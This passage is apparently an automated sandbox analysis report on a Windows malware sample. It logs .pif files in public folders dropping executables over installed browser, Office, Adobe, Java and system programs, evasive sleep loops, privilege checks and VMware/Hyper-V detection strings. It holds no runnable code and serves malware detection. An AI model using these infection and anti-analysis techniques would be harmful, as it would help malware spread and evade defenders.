Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Windows\System32\msiexec.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Windows\System32\TieringEngineService.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Dropped PE file which has not been started: C:\Windows\System32\sppsvc.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Windows\System32\wbem\WmiApSrv.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Windows\System32\wbengine.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Windows\System32\VSSVC.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Windows\System32\SearchIndexer.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Windows\System32\AgentService.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Windows\System32\OpenSSH\ssh-agent.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to dropped file

Found evasive API chain checking for process token information

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\FXSSVC.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\AppVClient.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes

Found large amount of non-executed APIs

Source: C:\Users\Public\alpha.pif	API coverage: 6.3 %
Source: C:\Users\Public\alpha.pif	API coverage: 7.9 %
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	API coverage: 9.7 %
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	API coverage: 8.9 %
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	API coverage: 9.6 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\Public\Libraries\wdmvmswJ.pif TID: 4784	Thread sleep time: -150000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif TID: 4468	Thread sleep time: -22136092888451448s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif TID: 6772	Thread sleep count: 5124 > 30	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif TID: 6772	Thread sleep count: 4310 > 30	Jump to behavior
Source: C:\Windows\System32\alg.exe TID: 4520	Thread sleep time: -90000s >= -30000s
Source: C:\Windows\System32\alg.exe TID: 6164	Thread sleep time: -60000s >= -30000s
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe TID: 3148	Thread sleep time: -60000s >= -30000s
Source: C:\Users\Public\Libraries\wdmvmswJ.pif TID: 5240	Thread sleep time: -260000s >= -30000s
Source: C:\Users\Public\Libraries\wdmvmswJ.pif TID: 5396	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\msdtc.exe TID: 2668	Thread sleep count: 484 > 30
Source: C:\Windows\System32\msdtc.exe TID: 2668	Thread sleep time: -48400s >= -30000s
Source: C:\Users\Public\Libraries\wdmvmswJ.pif TID: 2944	Thread sleep time: -250000s >= -30000s
Source: C:\Users\Public\Libraries\wdmvmswJ.pif TID: 5912	Thread sleep time: -922337203685477s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\Public\xpha.pif	Last function: Thread delayed

Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02AF5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	4_2_02AF5908
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00020207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,	13_2_00020207
Source: C:\Users\Public\alpha.pif	Code function: 13_2_0002589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,	13_2_0002589A
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00033E66 FindFirstFileW,FindNextFileW,FindClose,	13_2_00033E66
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00024EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	13_2_00024EC1
Source: C:\Users\Public\alpha.pif	Code function: 13_2_0001532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,	13_2_0001532E
Source: C:\Users\Public\alpha.pif	Code function: 17_2_0002589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,	17_2_0002589A
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00020207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,	17_2_00020207
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00033E66 FindFirstFileW,FindNextFileW,FindClose,	17_2_00033E66
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00024EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	17_2_00024EC1
Source: C:\Users\Public\alpha.pif	Code function: 17_2_0001532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,	17_2_0001532E

Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\alg.exe	Thread delayed: delay time: 60000
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Thread delayed: delay time: 60000
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Thread delayed: delay time: 922337203685477

Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to behavior

Source: Spectrum.exe, 0000002B.00000003.1834037087.00000000005A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @Y2VMware Virtual USB MouseJC:\Windows\System32\DDORes.dll,-2212
Source: Jwsmvmdw.PIF, 0000001B.00000002.1662054093.00000000006CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>>a9
Source: Spectrum.exe, 0000002B.00000003.1834037087.00000000005A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @wvid.infvid.devicedescMicrosoft Hyper-V Virtualization Infrastructure DriverN
Source: Spectrum.exe, 0000002B.00000003.1834037087.00000000005A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver4
Source: Spectrum.exe, 0000002B.00000003.1834037087.00000000005A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure DriverVHD Loopback Contr
Source: x.exe, 00000004.00000002.1544141056.0000000000706000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWr
Source: Spectrum.exe, 0000002B.00000003.1834037087.00000000005A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00
Source: x.exe, 00000004.00000002.1544141056.0000000000706000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1544141056.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1635254831.00000000005B2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2066991172.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1797911265.00000000005B2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2044644305.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2044644305.00000000005B2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2079470414.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2054624676.00000000005B2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1668502646.00000000005B2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1610304966.00000000005B2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Spectrum.exe, 0000002B.00000003.1834037087.00000000005A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: Spectrum.exe, 0000002B.00000003.1834037087.00000000005A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Devicen
Source: AppVClient.exe, 00000016.00000003.1594100597.00000000004A0000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000016.00000002.1595686617.00000000004A1000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000016.00000003.1593875501.0000000000470000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: appv:SoftwareClients/appv:JavaVirtualMachine
Source: xpha.pif, 00000012.00000002.1697939115.0000000002EAB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll
